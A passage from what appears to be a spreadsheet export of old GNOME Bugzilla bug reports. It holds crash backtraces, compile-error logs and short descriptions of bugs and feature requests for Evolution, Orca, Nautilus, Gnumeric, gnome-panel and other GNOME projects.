#55 0x404b2b98 in gtk_signal_real_emit (object=0x829df80 signal_id=27 
    params=0xbffff5b4) at gtksignal.c:1492
#56 0x404b0df0 in gtk_signal_emit (object=0x829df80 signal_id=27)
    at gtksignal.c:552
#57 0x404e585b in gtk_widget_event (widget=0x829df80 event=0x81b7930)
    at gtkwidget.c:2864
#58 0x40486a39 in gtk_propagate_event (widget=0x829df80 event=0x81b7930)
    at gtkmain.c:1378
#59 0x40485cca in gtk_main_do_event (event=0x81b7930) at gtkmain.c:818
#60 0x40539392 in gdk_event_dispatch (source_data=0x0 
    current_time=0xbffff938 user_data=0x0) at gdkevents.c:2139
#61 0x405699f6 in g_main_dispatch (dispatch_time=0xbffff938) at gmain.c:656
#62 0x40569fb1 in g_main_iterate (block=1 dispatch=1) at gmain.c:877
#63 0x4056a129 in g_main_run (loop=0x8149958) at gmain.c:935
#64 0x4048563a in gtk_main () at gtkmain.c:524
#65 0x408d8182 in bonobo_main () at bonobo-main.c:283
#66 0x80aa140 in main (argc=3 argv=0xbffff9e4) at main.c:156
#0  0x40b198e9 in __wait4 () from /lib/libc.so.6
No locals.
#1  0x40b781ec in ?? () from /lib/libc.so.6
No symbol table info available.
#2  0x40788995 in waitpid (pid=9719 stat_loc=0xbfffd5d8 options=0)
    at wrapsyscall.c:134
stat_loc = (int *) 0xbfffd5d8
options = 0
result = 0
oldtype = 0
#3  0x402e37ff in gnome_segv_handle (signum=11) at gnome-init.c:659
estatus = 1075073353
in_segv = 1
pid = 0
#4  0x40787552 in pthread_sighandler (signo=11 ctx={gs = 0 __gsh = 0 
      fs = 0 __fsh = 0 es = 43 __esh = 0 ds = 43 __dsh = 49168 
      edi = 4294967295 esi = 137366088 ebp = 3221215592 esp = 3221215572 
      ebx = 1075220644 edx = 1 ecx = 135788580 eax = 0 trapno = 14 
      err = 4 eip = 1074722043 cs = 35 __csh = 0 eflags = 2163202 
      esp_at_signal = 3221215572 ss = 43 __ssh = 0 fpstate = 0xbfffd6d8 
      oldmask = 2147483648 cr2 = 4294967292}) at signals.c:96
self = 0x4078e940
in_sighandler = 0x0
#5  0x40aa6c68 in __restore ()
    at ../sysdeps/unix/sysv/linux/i386/sigaction.c:127
No locals.
#6  0x40486d1d in gtk_marshal_NONE__INT (object=0x82ff418 
    func=0x400ef4bc  func_data=0x8300a48 
    args=0xbfffda28) at gtkmarshal.c:240
func = 0
args = (GtkArg *) 0xfffffe00
#7  0x404b3687 in gtk_handlers_run (handlers=0x82eff10 signal=0xbfffd9e4 
    object=0x82ff418 params=0xbfffda28 after=0) at gtksignal.c:1917
handlers_next = (GtkHandler *) 0x8300a48
handlers = (GtkHandler *) 0xffffffff
Unknown reporter: johne@bellatlantic.net changed to bugbuddy-import@ximian.com.
</t>
  </si>
  <si>
    <t>johne</t>
  </si>
  <si>
    <t>PITIVI-674990</t>
  </si>
  <si>
    <t>Timeline</t>
  </si>
  <si>
    <t>Bring back layer titles</t>
  </si>
  <si>
    <t>Created attachment 212993
patch
This brings back the titles for layers.</t>
  </si>
  <si>
    <t>palango</t>
  </si>
  <si>
    <t>METACITY-376760</t>
  </si>
  <si>
    <t>Refactor thrice-duplicated queue code in window.c</t>
  </si>
  <si>
    <t>There is a FIXME in window.c that says that the three window queues need to be handled by a common abstraction but are currently handled by copy-and-pasted code.
I have fixed this on my laptop but I'm in Cleveland and have no way of connecting the laptop up to the net so that I can post the patch. On Monday I will post the patch and you can all poke at it and review it.</t>
  </si>
  <si>
    <t>ORCA-450213</t>
  </si>
  <si>
    <t>should acc._narrow(Accessibility.Accessible) be a SEVERE error?</t>
  </si>
  <si>
    <t>I'm getting intermittent tracebacks Orca is processing an event from an application that has exited. In the following case gedit just exited.
BRAILLE LINE:  'gedit Application Question Alert Close without Saving Button'
     VISIBLE:  'Close without Saving Button' cursor=1
SPEECH OUTPUT: ''
SPEECH OUTPUT: 'Close without Saving button'
Traceback (most recent call last):
  File /usr/lib/python2.5/site-packages/orca/atspi.py line 667 in __init__
    self.accessible = acc._narrow(Accessibility.Accessible)
COMM_FAILURE
atspi.py:Accessible.__init__ NOT GIVEN AN ACCESSIBLE!
Should this always be a SEVERE error? It's throwing off regression testing because this error message is displayed intermittently. Maybe it should be a lower-priority message.</t>
  </si>
  <si>
    <t>ORCA-530541</t>
  </si>
  <si>
    <t>Suspending Orca in terminal screws up session</t>
  </si>
  <si>
    <t>Reproducible on Solaris Nevada b86 and b87 with Orca 2.20.2.
Run orca in terminal then suspend it with ^Z as if you were going to 'bg' it.  Entire GNOME session becomes immediately unresponsive can't click or type anywhere (although button mouseover highlights still occur suggesting session isn't completely dead).  Remotely killing all orca processes didn't help.</t>
  </si>
  <si>
    <t>EVOLUTION-208955</t>
  </si>
  <si>
    <t>Can drag and drop messages from inbox to desired folder</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: Normal
Version: 0.13.99
Synopsis: Can drag and drop messages from inbox to desired folder
Bugzilla-Product: Evolution
Bugzilla-Component: Mailer
Description:
I just installed Evolution 0.13.99[+cvs.2001.09.05.08.08]. I am not able
to drag and drop messages from inbox to desired folder with this build.
</t>
  </si>
  <si>
    <t>PYGTK-60390</t>
  </si>
  <si>
    <t>incorrect/missing enumerations in gtk/GDK.py</t>
  </si>
  <si>
    <t>in gnome-python/pygtk/gtk.GDK.py FONT_FONTSET should be 1 not 0
there are also several enumerations missing:
# GdkWindowState's
WINDOW_STATE_WITHDRAWN = 1 &lt;&lt; 0
WINDOW_STATE_ICONIFIED = 1 &lt;&lt; 1
WINDOW_STATE_MAXIMIZED = 1 &lt;&lt; 2
WINDOW_STATE_STICKY    = 1 &lt;&lt; 3
# GdkSettingAction's
SETTING_ACTION_NEW     = 0
SETTING_ACTION_CHANGED = 1
SETTING_ACTION_DELETED = 2
# GdkScrollDirection's
SCROLL_UP    = 0
SCROLL_DOWN  = 1
SCROLL_LEFT  = 2
SCROLL_RIGHT = 3</t>
  </si>
  <si>
    <t>GNOME-VFS-312343</t>
  </si>
  <si>
    <t>Can't copy directories on FTP servers</t>
  </si>
  <si>
    <t>Please describe the problem:
Nautilus gives a Access denied error when trying to copy a directory tree to
another directory on FTP servers.
Steps to reproduce:
1. Connect to an FTP server
2. Dir A contains a tree of files an subdirectory
3. Create a new directory B
4. Copy (with middle drag -&gt; Copy here) the contents of A to B
Actual results:
The operation is stopped by the error. Copying from the FTP server to the local
disk and then back to the FTP server works.
Expected results:
Does this happen every time?
Other information:</t>
  </si>
  <si>
    <t>EVOLUTION-206559</t>
  </si>
  <si>
    <t>can't have an imap folder named noselect=yes</t>
  </si>
  <si>
    <t>If you create an IMAP folder whose name contains the
string noselect=yes you won't be able to select it.</t>
  </si>
  <si>
    <t>FILE-ROLLER-142860</t>
  </si>
  <si>
    <t>File-roller displays files larger then 2GB as 2GB but extracts ok</t>
  </si>
  <si>
    <t>When looking in an archive using File-roller (a
.rar archive in this case) all files larger than
2GB are shown as precisely 2GB. But when extracted
the files are ok and keep their original size.</t>
  </si>
  <si>
    <t>TOMBOY-462421</t>
  </si>
  <si>
    <t>Enabled sync service not immediately available in list</t>
  </si>
  <si>
    <t>After enabling a sync service on the Add-ins tab the service is not immediately available in the list on the Synchronization tab. It is available after reopening the preferences dialog.</t>
  </si>
  <si>
    <t>LIBGNOMEUI-151496</t>
  </si>
  <si>
    <t>html doc missing in 2.7.92</t>
  </si>
  <si>
    <t>the html doc is missing please don't forget in for the 2.8 tarball</t>
  </si>
  <si>
    <t>NAUTILUS-121589</t>
  </si>
  <si>
    <t>Typo in a schema key</t>
  </si>
  <si>
    <t>#: libnautilus-private/apps_nautilus_preferences.schemas.in.h:48
msgid If true icons will be layed out tighter by default in new windows.
This should be ..icons will be laid out tighter... no?</t>
  </si>
  <si>
    <t>GTK+-464847</t>
  </si>
  <si>
    <t>Allow null dest argument in gdk_rectangle_intersect</t>
  </si>
  <si>
    <t>Xan Lopez wrote in bug 464528:
Probably this should go in a different bug but while we are at it...
Recently I used gdk_rectangle_intersect just for its boolean return value
without being interested at all in the actual intersecting area but it has a
g_return_val_if_fail (dest != NULL FALSE) forcing you to pass a dummy
variable. IMHO a NULL value should be allowed for dest.</t>
  </si>
  <si>
    <t>GNOME-PANEL-133257</t>
  </si>
  <si>
    <t>A .recently-used file makes the panel crash</t>
  </si>
  <si>
    <t xml:space="preserve">Distribution: Debian testing/unstable
Package: gnome-panel
Severity: normal
Version:  unspecified
Synopsis: A .recently-used file make the panel crash
Bugzilla-Product: gnome-panel
Bugzilla-Component: general
Bugzilla-Version: unspecified
Description:
Description of Problem:
It's the common segmentation fault this time with a .recently-used
file
Steps to reproduce the problem:
1. replace your .recently-used file by :
    file://att=1
    application/octet-stream
    1070628494
      gedit
2.  The panel will do a segmentation fault
Actual Results:
segmentation fault
Expected Results:
no segmentation fault
How often does this happen?
every time I tried
Additional Information:
------- Bug moved to this database by unknown@bugzilla.gnome.org 2004-02-02 18:17 -------
The original reporter (gnomebug.20.vanicat@spamgourmet.com) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
Reassigning to the default owner of the component gnome-panel-maint@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>gnomebug.20.vanicat</t>
  </si>
  <si>
    <t>GNUMERIC-124951</t>
  </si>
  <si>
    <t>[patch] NetBSD compile error: foo-canvas-util.c: `M_PI' undeclared</t>
  </si>
  <si>
    <t xml:space="preserve">I got the following compile error in Gnumeric 1.2.1:
...
gcc -DHAVE_CONFIG_H -I. -I. -I../../../.. -I../../../..                   
                -I../../../..                                   -Wall
-Wmissing-
prototypes                                              -DORBIT2=1
-D_REENTRANT 
-I/usr/local/include/glib-2.0 -I/usr/local/lib/glib-2.0/include
-I/usr/local/inc
lude/libgsf-1 -I/usr/local/include/libxml2 -I/usr/local/include/gtk-2.0
-I/usr/l
ocal/lib/gtk-2.0/include -I/usr/local/include/atk-1.0
-I/usr/local/include/pango
-1.0 -I/usr/X11R6/include -I/usr/local/include/libglade-2.0
-I/usr/local/include
/libgnomecanvas-2.0 -I/usr/local/include/libart-2.0 -I/usr/local/include
-I/usr/
local/include/freetype2 -I/usr/local/include/libgnome-2.0
-I/usr/local/include/o
rbit-2.0 -I/usr/local/include/libbonobo-2.0 -I/usr/local/include/gconf/2
-I/usr/
local/include/gnome-vfs-2.0 -I/usr/local/lib/gnome-vfs-2.0/include
-I/usr/local/
include/bonobo-activation-2.0 -I/usr/local/include/libgnomeui-2.0
-I/usr/local/i
nclude/libbonoboui-2.0 -I/usr/local/include/libgnomeprint-2.2
-I/usr/local/inclu
de/libgnomeprintui-2.2   -I../../../../src                             
-DFOOCAN
VASLIBDIR=\/usr/local/lib\                 
-DFOOCANVASDATADIR=\/usr/local
/share\                      
-DFOOCANVASPIXMAPDIR=\/usr/local/share/pixmaps
\             -DFOOCANVASBINDIR=\/usr/local/bin\                 
-DFOOCAN
VASLOCALSTATEDIR=\/usr/local/var\           -DFOOCANVASLOCALEDIR=\\
        -DG_LOG_DOMAIN=\Foocanvas\                           
-DVERSION=\1.2.
1\    -O2 -mcpu=v8 -DG_DISABLE_DEPRECATED -DGDK_PIXBUF_DISABLE_DEPRECATED
-DGDK
_DISABLE_DEPRECATED -DGDK_MULTIHEAD_SAFE -DGTK_DISABLE_DEPRECATED
-DGNOME_DISABL
E_DEPRECATED -DPANGO_DISABLE_DEPRECATED -DLIBGLADE_DISABLE_DEPRECATED -Wall
-Wmi
ssing-prototypes  -Wsign-compare -Wpointer-arith -Wnested-externs
-Wchar-subscri
pts -Wwrite-strings -D_POSIX_SOURCE -D__EXTENSIONS__ -D_BSD_SOURCE -c
foo-canvas
-util.c
foo-canvas-util.c: In function `foo_canvas_get_miter_points':
foo-canvas-util.c:151: `M_PI' undeclared (first use in this function)
foo-canvas-util.c:151: (Each undeclared identifier is reported only once
foo-canvas-util.c:151: for each function it appears in.)
foo-canvas-util.c:153: `M_PI_2' undeclared (first use in this function)
make[5]: *** [foo-canvas-util.o] Error 1
make[5]: Leaving directory
`/aux/adrian/build/gnumeric-1.2.1/src/cut-n-paste-code/foocanvas/libfoocanvas'
/usr/include/math.h contains:
...
/*
 * XOPEN/SVID
 */
#if !defined(_ANSI_SOURCE) &amp;&amp; !defined(_POSIX_C_SOURCE) || \
    defined(_XOPEN_SOURCE)
#define M_E             2.7182818284590452354   /* e */
#define M_LOG2E         1.4426950408889634074   /* log 2e */
#define M_LOG10E        0.43429448190325182765  /* log 10e */
#define M_LN2           0.69314718055994530942  /* log e2 */
#define M_LN10          2.30258509299404568402  /* log e10 */
#define M_PI            3.14159265358979323846  /* pi */
#define M_PI_2          1.57079632679489661923  /* pi/2 */
#define M_PI_4          0.78539816339744830962  /* pi/4 */
#define M_1_PI          0.31830988618379067154  /* 1/pi */
#define M_2_PI          0.63661977236758134308  /* 2/pi */
#define M_2_SQRTPI      1.12837916709551257390  /* 2/sqrt(pi) */
#define M_SQRT2         1.41421356237309504880  /* sqrt(2) */
#define M_SQRT1_2       0.70710678118654752440  /* 1/sqrt(2) */
#define MAXFLOAT        ((float)3.40282346638528860e+38)
extern int signgam
#endif /* !_ANSI_SOURCE &amp;&amp; !_POSIX_C_SOURCE || _XOPEN_SOURCE */
...
</t>
  </si>
  <si>
    <t>EVOLUTION-477045</t>
  </si>
  <si>
    <t>Use standard icon names</t>
  </si>
  <si>
    <t>With the help of Federico's GtkIconCache logging patch [1] I made a focused effort to bring Evolution into compliance with the Icon Naming Specification [2].
Question for Srini:
I was unsure of whether to replace emblem-important with mail-mark-important.  I personally think the emblem looks better for Evolution (at least with the Bluecurve theme) but obviously mail-mark-important is a better fit conceptually.
[1] http://primates.ximian.com/~federico/news-2007-05.html#04
[2] http://standards.freedesktop.org/icon-naming-spec/latest/index.html</t>
  </si>
  <si>
    <t>GNOME-CONTROL-CENTER-148652</t>
  </si>
  <si>
    <t>misc issues with capplet dialog titles</t>
  </si>
  <si>
    <t>* 'Sound preferences' should be capitalized.
* 'Network Proxy Configuration' should be '... Preferences'
* 'Keyboard Shortcuts' does not mention preferences in its title nor do the
'Sessions' and 'Preferred Applications' ones.
* 'Menus &amp; Toolbars' in the menu might have the &amp; spelled out as the dialog
title does say 'and'
In fact I'd rather change the titles of all the capplets -not- to include the
word 'Preferences' in them. For one thing iirc the HIG likes dialog to have the
same title as the menu item that brings them up. It does look better IMO.
(Btw the capplets might use the GTK_STOCK_PROPERTIES icon for their window icon
unless there is a more specific one the default one looks unenlightening)</t>
  </si>
  <si>
    <t>GNOME-CORE-54367</t>
  </si>
  <si>
    <t>The panel crashed when I pressed the windowselector in the upper right corner.</t>
  </si>
  <si>
    <t xml:space="preserve">Package: gnome-core
Severity: normal
Version: 1.4.0.2
Synopsis: The panel crashed when I pressed the windowselector in the upper right corner.
Bugzilla-Product: gnome-core
Bugzilla-Component: panel
Description:
Don't really know how to reproduce this but I hope you can use the crashdata.
Ã pressed the windowselector in the upper right corner of the menu panel
och the panel crashed. I'm using Red Hat 7.1 linux-2.4.3 kernel and
Ximian Gnome 1.4 with the standard desktop that comes with gnome.
Hope you can make something of this.
Debugging Information:
(no debugging symbols found)...0x405ad519 in __wait4 ()
   from /lib/i686/libc.so.6
#0  0x405ad519 in __wait4 () from /lib/i686/libc.so.6
#1  0x4061d9e4 in __DTOR_END__ () from /lib/i686/libc.so.6
#2  0x4017b28a in gnome_segv_handle (signum=11) at gnome-init.c:659
#3  
#4  0x0809d17c in foobar_widget_update_winhints () at eval.c:41
#5  0x400af60d in g_list_foreach (list=0x833ebac 
    func=0x809d120  user_data=0x812be88)
    at glist.c:494
#6  0x0809d3c4 in foobar_widget_update_winhints () at eval.c:41
#7  0x402c1a03 in gtk_marshal_NONE__NONE (object=0x814bfe0 
    func=0x809d36c  func_data=0x812be88 
    args=0xbfffef08) at gtkmarshal.c:312
#8  0x402f10d6 in gtk_handlers_run (handlers=0x814efd8 signal=0xbfffeea8 
    object=0x814bfe0 params=0xbfffef08 after=0) at gtksignal.c:1917
#9  0x402f0537 in gtk_signal_real_emit (object=0x814bfe0 signal_id=73 
    params=0xbfffef08) at gtksignal.c:1477
#10 0x402ee5ac in gtk_signal_emit (object=0x814bfe0 signal_id=73)
    at gtksignal.c:552
#11 0x402b1548 in gtk_item_select (item=0x814bfe0) at gtkitem.c:132
#12 0x402c70d5 in gtk_menu_item_select (menu_item=0x814bfe0)
    at gtkmenuitem.c:295
#13 0x402c9b0c in gtk_menu_shell_select_item (menu_shell=0x814ae68 
    menu_item=0x814bfe0) at gtkmenushell.c:799
#14 0x402c8df0 in gtk_menu_shell_button_press (widget=0x814ae68 
    event=0x815f9e0) at gtkmenushell.c:435
#15 0x402c17d9 in gtk_marshal_BOOL__POINTER (object=0x814ae68 
    func=0x402c8c5c  func_data=0x0 
    args=0xbffff2f8) at gtkmarshal.c:28
#16 0x402f0577 in gtk_signal_real_emit (object=0x814ae68 signal_id=27 
    params=0xbffff2f8) at gtksignal.c:1492
#17 0x402ee5ac in gtk_signal_emit (object=0x814ae68 signal_id=27)
    at gtksignal.c:552
#18 0x40325978 in gtk_widget_event (widget=0x814ae68 event=0x815f9e0)
    at gtkwidget.c:2864
#19 0x402c1750 in gtk_propagate_event (widget=0x814bfe0 event=0x815f9e0)
    at gtkmain.c:1378
#20 0x402c090d in gtk_main_do_event (event=0x815f9e0) at gtkmain.c:818
#21 0x4037a12b in gdk_event_dispatch (source_data=0x0 
    current_time=0xbffff6c8 user_data=0x0) at gdkevents.c:2139
#22 0x400b0055 in g_main_dispatch (dispatch_time=0xbffff6c8) at gmain.c:656
#23 0x400b0659 in g_main_iterate (block=1 dispatch=1) at gmain.c:877
#24 0x400b07e8 in g_main_run (loop=0x816df50) at gmain.c:935
#25 0x402c0213 in gtk_main () at gtkmain.c:524
#26 0x0805d0f1 in main () at eval.c:41
#27 0x4050f177 in __libc_start_main (main=0x805cde4  argc=5 
    ubp_av=0xbffff7cc init=0x8055e00  fini=0x80a099c  
    rtld_fini=0x4000e184  stack_end=0xbffff7c4)
    at ../sysdeps/generic/libc-start.c:129
#0  0x405ad519 in __wait4 () from /lib/i686/libc.so.6
No locals.
#1  0x4061d9e4 in __DTOR_END__ () from /lib/i686/libc.so.6
No symbol table info available.
#2  0x4017b28a in gnome_segv_handle (signum=11) at gnome-init.c:659
	in gnome-init.c
estatus = 138296248
in_segv = 1
pid = 0
#3  
No locals.
#4  0x0809d17c in foobar_widget_update_winhints () at eval.c:41
	in eval.c
ap = (void **) 0x0
digval = 4294966784
digval = 4294966784
digval = 4294966784
digval = 4294966784
p = 0x818e0d0 
result = 0
result = 135848144
#5  0x400af60d in g_list_foreach (list=0x833ebac 
    func=0x809d120  user_data=0x812be88)
    at glist.c:494
	in glist.c
list = (GList *) 0x812be88
user_data = 0x0
#6  0x0809d3c4 in foobar_widget_update_winhints () at eval.c:41
	in eval.c
ap = (void **) 0x814bfe0
digval = 4294966784
digval = 4294966784
digval = 4294966784
digval = 4294966784
p = 0x833ebac  \030B\b\234\025/\b
result = 135577568
result = 137620396
#7  0x402c1a03 in gtk_marshal_NONE__NONE (object=0x814bfe0 
    func=0x809d36c  func_data=0x812be88 
    args=0xbfffef08) at gtkmarshal.c:312
	in gtkmarshal.c
No locals.
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-05-08 21:28 -------
The original reporter (cjk@razor.hemmet.chalmers.se) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
Reassigning to the default owner of the component panel-maint@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>cjk</t>
  </si>
  <si>
    <t>PAN-60695</t>
  </si>
  <si>
    <t>Filters bug</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Pan
Severity: normal
Version: 0.10.0
Synopsis: Filters bug
Bugzilla-Product: Pan
Bugzilla-Component: general
Description:
When I try to create a filter with any match other than ALL OF: (i.e.
Negate/NONE OF:) the match reverts back to ALL OF: before the filter
is saved.
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-09-18 10:57 -------
The original reporter (gnome-bugs@interlinx.bc.ca) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
Reassigning to the default owner of the component charles@rebelbase.com.
</t>
  </si>
  <si>
    <t>EVOLUTION-200789</t>
  </si>
  <si>
    <t>i18n: attachment headers are not translated</t>
  </si>
  <si>
    <t>This is partly gnome-vfs's fault (MIME type name translations) and partly
evolution-mail's (at least the word attachment).</t>
  </si>
  <si>
    <t>RHYTHMBOX-113944</t>
  </si>
  <si>
    <t>rhythmbox HEAD leaks memory</t>
  </si>
  <si>
    <t>it started taking aprox. 48 megs of rams after around 20 horus playing
without being stop top reports rhtymbox takes 
  PID USER      PR  NI  VIRT  RES  SHR S %CPU %MEM    TIME+  Command
18494 diego     15   0  107m  61m  19m S  4.3 24.5   0:05.62 rhythmbox
which is quite a lot more.
well i certainly don't know if it is rhythmbox monkey-media or gstremer it
self to be fair.</t>
  </si>
  <si>
    <t>F-SPOT-158490</t>
  </si>
  <si>
    <t>f-spot should remember tag tree when editing tags</t>
  </si>
  <si>
    <t>If you create a tag edit a tag or delete a tag then the tag tree view
collapses. It should remember its state.</t>
  </si>
  <si>
    <t>EVOLUTION-205291</t>
  </si>
  <si>
    <t>PGP does not decrypt original message on reply</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: Normal
Version: 0.11.99
Synopsis: PGP does not decrypt original message on reply
Bugzilla-Product: Evolution
Bugzilla-Component: Mailer
Description:
When replying to an encrypted message the original message body comes over as encrypted.  This would sure be nice if it decrypted it prior to placing it in the reply.
Thanks!
   Ken
</t>
  </si>
  <si>
    <t>kvschar</t>
  </si>
  <si>
    <t>NETWORKMANAGER-439310</t>
  </si>
  <si>
    <t>the user has no information of internet availability</t>
  </si>
  <si>
    <t>adding a small world icon in a corner of the icon would help users a lot in debugging their network problems
Other information:
I'm attaching a patch proposal.
the function that is detecting if internet is available or not is blank because I don't know if it has already been implemented somewhere</t>
  </si>
  <si>
    <t>GNOME-PILOT-64204</t>
  </si>
  <si>
    <t>pilot services crashed</t>
  </si>
  <si>
    <t xml:space="preserve">Package: gnome-pilot
Severity: normal
Version: 0.1.61
Synopsis: pilot services crashed
Bugzilla-Product: gnome-pilot
Bugzilla-Component: gpilotd
Description:
changing settings in panel when it crashed
Debugging Information:
(no debugging symbols found)...[New Thread 1024 (LWP 1231)]
0x40818c09 in __wait4 () from /lib/libc.so.6
#0  0x40818c09 in __wait4 () from /lib/libc.so.6
#1  0x40894fd0 in __DTOR_END__ () from /lib/libc.so.6
#2  0x406f38de in waitpid (pid=1270 stat_loc=0xbfffefec options=0)
    at wrapsyscall.c:172
#3  0x40342262 in gnome_segv_handle (signum=11) at gnome-init.c:659
#4  0x406f14c7 in pthread_sighandler (signo=11 ctx=
      {gs = 0 __gsh = 0 fs = 0 __fsh = 0 es = 43 __esh = 0 ds = 43 __dsh = 0 edi = 1852403824 esi = 134647184 ebp = 3221222328 esp = 3221222296 ebx = 134767576 edx = 1081068704 ecx = 1 eax = 134832584 trapno = 14 err = 4 eip = 134562111 cs = 35 __csh = 0 eflags = 66194 esp_at_signal = 3221222296 ss = 43 __ssh = 0 fpstate = 0xbffff118 oldmask = 2147483648 cr2 = 1852403824}) at signals.c:97
#5  
#6  0x0805413f in savePilotState () at eval.c:41
#7  0x08053922 in save_config_and_restart () at eval.c:41
#8  0x0804e687 in gnome_pilot_capplet_update () at eval.c:41
#9  0x405e7fe7 in gtk_marshal_NONE__NONE (object=0x808c600 
    func=0x804e6bc  func_data=0x8068d90 
    args=0xbffff500) at gtkmarshal.c:312
#10 0x40617706 in gtk_handlers_run (handlers=0x8067988 signal=0xbffff490 
    object=0x808c600 params=0xbffff500 after=0) at gtksignal.c:1917
#11 0x40616b57 in gtk_signal_real_emit (object=0x808c600 signal_id=83 
    params=0xbffff500) at gtksignal.c:1477
#12 0x40614f5b in gtk_signal_emit_by_name (object=0x808c600 
    name=0x400510dc cancel) at gtksignal.c:618
#13 0x4004e200 in _capplet_widget_server_cancel (id=4) at capplet-widget.c:257
#14 0x4004e4fc in server_cancel (servant=0x400527ac id=4 ev=0xbffff840)
    at capplet-widget-libs.c:95
#15 0x4004ecbd in _ORBIT_skel_GNOME_capplet_cancel (_ORBIT_servant=0x400527ac 
    _ORBIT_recv_buffer=0x80955b8 ev=0xbffff840 
    _impl_cancel=0x4004e4e0 ) at control-center-skels.c:182
#16 0x40530210 in ORBit_POA_handle_request (recv_buffer=0x80955b8 
    poa=0x808a220) at orbit_poa.c:513
#17 0x4053247a in ORBit_handle_incoming_request (recv_buffer=0x80955b8)
    at server.c:90
#18 0x405326a1 in ORBit_handle_incoming_message (recv_buffer=0x80955b8)
    at server.c:160
#19 0x40549ce4 in giop_main_handle_connection (connection=0x80d7a08)
    at connection.c:1214
#20 0x404fbb01 in orb_handle_connection (source=0x809cb38 cond=G_IO_IN 
    cnx=0x80d7a08) at oaf-mainloop.c:70
#21 0x406d3a7a in g_io_unix_dispatch (source_data=0x80d3798 
    current_time=0xbffff9d0 user_data=0x80d7a08) at giounix.c:137
#22 0x406d5055 in g_main_dispatch (dispatch_time=0xbffff9d0) at gmain.c:656
#23 0x406d5659 in g_main_iterate (block=1 dispatch=1) at gmain.c:877
#24 0x406d57e8 in g_main_run (loop=0x80d24b0) at gmain.c:935
#25 0x405e67f7 in gtk_main () at gtkmain.c:524
#26 0x4004e641 in capplet_corba_gtk_main () at capplet-widget-libs.c:140
#27 0x4004e01a in capplet_gtk_main () at capplet-widget.c:208
#28 0x0804d300 in main () at eval.c:41
#29 0x40781306 in __libc_start_main (main=0x804cedc  argc=3 
    ubp_av=0xbffffb8c init=0x804c138  fini=0x8056f60  
    rtld_fini=0x4000d2cc  stack_end=0xbffffb7c)
    at ../sysdeps/generic/libc-start.c:129
Thread 1 (Thread 1024 (LWP 1231)):
#0  0x40818c09 in __wait4 () from /lib/libc.so.6
#1  0x40894fd0 in __DTOR_END__ () from /lib/libc.so.6
#2  0x406f38de in waitpid (pid=1270 stat_loc=0xbfffefec options=0)
    at wrapsyscall.c:172
#3  0x40342262 in gnome_segv_handle (signum=11) at gnome-init.c:659
#4  0x406f14c7 in pthread_sighandler (signo=11 ctx=
      {gs = 0 __gsh = 0 fs = 0 __fsh = 0 es = 43 __esh = 0 ds = 43 __dsh = 0 edi = 1852403824 esi = 134647184 ebp = 3221222328 esp = 3221222296 ebx = 134767576 edx = 1081068704 ecx = 1 eax = 134832584 trapno = 14 err = 4 eip = 134562111 cs = 35 __csh = 0 eflags = 66194 esp_at_signal = 3221222296 ss = 43 __ssh = 0 fpstate = 0xbffff118 oldmask = 2147483648 cr2 = 1852403824}) at signals.c:97
#5  
#6  0x0805413f in savePilotState () at eval.c:41
#7  0x08053922 in save_config_and_restart () at eval.c:41
#8  0x0804e687 in gnome_pilot_capplet_update () at eval.c:41
#9  0x405e7fe7 in gtk_marshal_NONE__NONE (object=0x808c600 
    func=0x804e6bc  func_data=0x8068d90 
    args=0xbffff500) at gtkmarshal.c:312
#10 0x40617706 in gtk_handlers_run (handlers=0x8067988 signal=0xbffff490 
    object=0x808c600 params=0xbffff500 after=0) at gtksignal.c:1917
#11 0x40616b57 in gtk_signal_real_emit (object=0x808c600 signal_id=83 
    params=0xbffff500) at gtksignal.c:1477
#12 0x40614f5b in gtk_signal_emit_by_name (object=0x808c600 
    name=0x400510dc cancel) at gtksignal.c:618
#13 0x4004e200 in _capplet_widget_server_cancel (id=4) at capplet-widget.c:257
#14 0x4004e4fc in server_cancel (servant=0x400527ac id=4 ev=0xbffff840)
    at capplet-widget-libs.c:95
#15 0x4004ecbd in _ORBIT_skel_GNOME_capplet_cancel (_ORBIT_servant=0x400527ac 
    _ORBIT_recv_buffer=0x80955b8 ev=0xbffff840 
    _impl_cancel=0x4004e4e0 ) at control-center-skels.c:182
#16 0x40530210 in ORBit_POA_handle_request (recv_buffer=0x80955b8 
    poa=0x808a220) at orbit_poa.c:513
#17 0x4053247a in ORBit_handle_incoming_request (recv_buffer=0x80955b8)
    at server.c:90
#18 0x405326a1 in ORBit_handle_incoming_message (recv_buffer=0x80955b8)
    at server.c:160
#19 0x40549ce4 in giop_main_handle_connection (connection=0x80d7a08)
    at connection.c:1214
#20 0x404fbb01 in orb_handle_connection (source=0x809cb38 cond=G_IO_IN 
    cnx=0x80d7a08) at oaf-mainloop.c:70
#21 0x406d3a7a in g_io_unix_dispatch (source_data=0x80d3798 
    current_time=0xbffff9d0 user_data=0x80d7a08) at giounix.c:137
#22 0x406d5055 in g_main_dispatch (dispatch_time=0xbffff9d0) at gmain.c:656
#23 0x406d5659 in g_main_iterate (block=1 dispatch=1) at gmain.c:877
#24 0x406d57e8 in g_main_run (loop=0x80d24b0) at gmain.c:935
#25 0x405e67f7 in gtk_main () at gtkmain.c:524
#26 0x4004e641 in capplet_corba_gtk_main () at capplet-widget-libs.c:140
#27 0x4004e01a in capplet_gtk_main () at capplet-widget.c:208
#28 0x0804d300 in main () at eval.c:41
#29 0x40781306 in __libc_start_main (main=0x804cedc  argc=3 
    ubp_av=0xbffffb8c init=0x804c138  fini=0x8056f60  
    rtld_fini=0x4000d2cc  stack_end=0xbffffb7c)
    at ../sysdeps/generic/libc-start.c:129
#0  0x40818c09 in __wait4 () from /lib/libc.so.6
#0  0x40818c09 in __wait4 () from /lib/libc.so.6
No locals.
#1  0x40894fd0 in __DTOR_END__ () from /lib/libc.so.6
No symbol table info available.
#2  0x406f38de in waitpid (pid=1270 stat_loc=0xbfffefec options=0)
    at wrapsyscall.c:172
	in wrapsyscall.c
stat_loc = (int *) 0xbfffefec
options = 0
result = 0
oldtype = 0
